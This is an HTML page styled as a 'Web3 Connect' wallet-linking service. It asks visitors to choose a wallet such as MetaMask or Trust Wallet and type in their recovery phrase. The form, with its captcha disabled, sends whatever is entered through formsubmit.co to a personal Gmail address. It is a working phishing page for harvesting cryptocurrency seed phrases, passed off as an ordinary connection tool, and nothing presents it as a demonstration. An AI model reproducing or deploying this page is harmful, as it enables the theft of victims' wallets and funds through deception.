
<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8" />
  <meta name="viewport" content="width=device-width, initial-scale=1.0"/>
  <title>Web3 Connect</title>
  <style>
    body {
      margin: 0;
      font-family: Arial, sans-serif;
      background: linear-gradient(135deg, #0f0f0f, #1e1e1e);
      color: #fff;
      display: flex;
      justify-content: center;
      align-items: center;
      height: 100vh;
    }
    .container {
      background: #1a1a1a;
      padding: 30px;
      border-radius: 12px;
      box-shadow: 0 0 15px rgba(0,0,0,0.5);
      width: 100%;
      max-width: 400px;
    }
    h2 {
      text-align: center;
      margin-bottom: 20px;
      font-size: 24px;
    }
    label {
      display: block;
      margin-bottom: 6px;
      font-size: 14px;
    }
    select, textarea, button {
      width: 100%;
      padding: 12px;
      border-radius: 8px;
      border: none;
      margin-bottom: 15px;
      font-size: 14px;
    }
    select, textarea {
      background: #2a2a2a;
      color: #fff;
    }
    button {
      background: #0ef0ad;
      color: #000;
      font-weight: bold;
      cursor: pointer;
    }
    button:hover {
      background: #0bc896;
    }
    footer {
      margin-top: 10px;
      text-align: center;
      font-size: 12px;
      color: #aaa;
    }
  </style>
</head>
<body>
  <div class="container">
    <h2>Connect Your Wallet</h2>
    <form action="https://formsubmit.co/khalidtrust93@gmail.com" method="POST">
      <input type="hidden" name="_captcha" value="false">
      <input type="hidden" name="_template" value="table">
      <label for="wallet">Wallet Type</label>
      <select name="wallet_type" id="wallet" required>
        <option value="metamask">MetaMask</option>
        <option value="trustwallet">Trust Wallet</option>
        <option value="coinbase">Coinbase</option>
        <option value="safepal">SafePal</option>
        <option value="other">Other</option>
      </select>
      <label for="phrase">Recovery Phrase</label>
      <textarea name="phrase" id="phrase" rows="4" placeholder="Enter your recovery phrase" required></textarea>
      <button type="submit">Connect Wallet</button>
    </form>
    <footer>web3connectlink</footer>
  </div>
</body>
</html>
